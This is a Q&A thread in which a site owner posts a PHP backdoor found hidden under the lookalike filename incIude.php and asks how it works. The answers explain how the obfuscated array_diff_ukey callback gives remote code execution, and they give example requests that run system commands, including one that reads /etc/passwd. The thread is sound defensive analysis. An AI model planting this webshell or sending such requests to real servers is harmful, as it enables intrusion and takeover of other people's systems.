# incIude.php, spelled with a capital "i" in the "l" position

Tags: php

I received a message from Siteground today with the subject "Vulnerable software detected on your account".  (I love me some Siteground;  no problem with their detection.)

When I investigate the files they found, there is a PHP file that exists in a few of my add on domains.  It is incIude.php with a capital "i" in the "l" position.  Even on this site, it looks the same as when properly spelled, because of the font.  Obviously fishy.  But curiously, the file is dated back in 2013.  Any search I attempt comes back with links to typo-corrected files.  It's the typo that is critical.

Anyway, here is the code in that file:

```
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>
```

Obviously, I'm at work cleaning this up.  I'm just curious as to whether any of your subscribers can tell me more about this particular exploit.

Answer (score 2):

It seems this is a simple backdoor script for RCE (Remote Code Execution). Re-formatting the script:

```
@array_diff_ukey(
  @array(
    (string)$_REQUEST['password'] => 1
  ),
  @array(
    (string)stripslashes($_REQUEST['re_password']) => 2
  ),
  $_REQUEST['login']
);
```

Everything is prefixed with `@` to make sure no errors, exceptions, or warnings are issued. This would give away the backdoor script.

The important vulnerability here is that the last argument of [`array_diff_ukey`](http://php.net/manual/en/function.array-diff-ukey.php) is a callback function. Per usual in PHP this can be an anonymous function, function variable, or a string.

So the attack is:

- include the script somewhere, somehow (innocent git commit? small change by an insider? temporary write access to the codebase?); in particular a login / registration endpoint that would include `login` and `register` in the form fields, but anywhere works (since the request can still include `login` and `register` parameters)
- send a request like `?login=system&password=ls`
- the function specified as `login` gets called with keys from either array, i.e. from `password` and `re_password`; in the example the function would be `system("ls", NULL)`
- profit! (RCE)

The stealthiness comes from:

- an innocent looking filename, normally indistinguishable from "include"
- no errors thrown
- executed on login attempts which might be part of regular requests and not logged properly

Answer (score 1):

It calls an arbitrary function named with the `login` query parameter that accepts up to two parameters, with the first parameter being the value of the `password` field, and the second parameter being the value of the `re_password` field. For instance:

```
http://yoursite.com/incIude.php?login=system&password=cat%20%2fetc%2fpasswd
```

will print the contents of /etc/passwd.